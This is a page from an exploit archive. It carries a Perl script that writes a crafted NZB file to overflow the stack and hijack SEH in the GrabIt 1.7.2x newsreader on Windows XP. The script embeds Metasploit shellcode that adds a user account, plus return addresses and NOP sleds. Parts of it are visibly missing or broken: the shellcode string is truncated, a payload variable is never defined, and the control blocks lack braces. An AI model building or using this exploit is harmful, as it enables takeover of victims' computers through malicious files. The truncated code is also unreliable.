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GrabIt 1.7.2x NZB DTD Reference Buffer Overflow Exploit

Jeremy Brown
Security Risk Unsored
local exploits
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GrabIt 1.7.2x NZB DTD Reference Buffer Overflow Exploit

# theroadoutsidemyhouseispavedwithgoodintentions.pl
# GrabIt 1.7.2x NZB DTD Reference Buffer Overflow Exploit
# ***********************************************************************************************************
# It seems I couldn't gather my resources quickly enough before the first exploit came out.. and it came as
# no surprise that it was a disappointment like so many others out there. I personally used to use this
# newsgroup program all the time, usenet is a nice service :) GrabIt is great-- Kudos to Shemes for sure.
# ***********************************************************************************************************
# After reading the advisory then debugging, I found the bug is a fairly standard hit and run stack overflow..
# we can overwrite SEH like a dream, so sadly this one may turn into malware rather quickly.. uh oh. Advice
# at the moment shall be.. update GrabIt quickly, like right now!
# ***********************************************************************************************************
#                libeay32.dll
# 1001A384   5B               POP EBX
# 1001A385   5D               POP EBP
# 1001A386   C3               RETN
# This exploit has been successfully tested in the following environments...
# Windows XP Home SP3 -> GrabIt 1.7.2b3 (GrabIt172b3.exe)
#                        GrabIt 1.7.2b2 (GrabIt172b2.exe)
#                        GrabIt 1.7.2b  (GrabIt172b.exe)
# Windows XP Pro SP3  -> GrabIt 1.7.2b3 (GrabIt172b3.exe)
#                        GrabIt 1.7.2b2 (GrabIt172b2.exe)
#                        GrabIt 1.7.2b  (GrabIt172b.exe)
# ***********************************************************************************************************
# BRONBRONGOTMVP: The Houston and LA series is heating up! I got the Lakers in 6 :D
# ***********************************************************************************************************
# theroadoutsidemyhouseispavedwithgoodintentions.pl

$nextsehh = 0x909006EB; # jmp 6
$sehh     = 0x1001A384; # pop, pop, ret @ libeay32.dll

# win32_adduser -  PASS=face EXITFUNC=process USER=smiley Size=236 Encoder=PexFnstenvSub http://metasploit.com
$sc = "\x31\xc9\x83\xe9\xcb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe8".

$filename = $ARGV[0];
$target   = $ARGV[1];

     print "\n            GrabIt 1.7.2x NZB DTD Reference Buffer Overflow Exploit";
     print "\n                     Jeremy Brown [0xjbrown41\@gmail.com]\n";

if((!defined($filename) || !defined($target)))

     print "\nUsage: $0 pwn.nzb <target>\n";
     print "\nTargets: [1] Windows XP Home\n         [2] Windows XP Pro\n\n";


$nextseh = pack('l', $nextsehh);
$seh     = pack('l', $sehh);
$nop     = "\x90";

$nzb1 = "<?xml version=\"1.0\" encoding=\"utf-8\" ?>\n";

# Lets get nice and comfortable
if($target == "1") { $payload = $nzb1 . $nzb2 . $nop x 248 . $nextseh . $seh . $nop x 32 . $sc . "\">"; }
if($target == "2") { $payload = $nzb1 . $nzb2 . $nop x 251 . $nextseh . $seh . $nop x 32 . $sc . "\">"; }

     open(FILE, ">", $filename) or die("\nError: Can't write to $filename! Exploit stopped");
     print FILE $payload;

     print "\nExploit NZB \"$filename\" successfully created.\n\n";

#  0day.today [2024-09-28]  #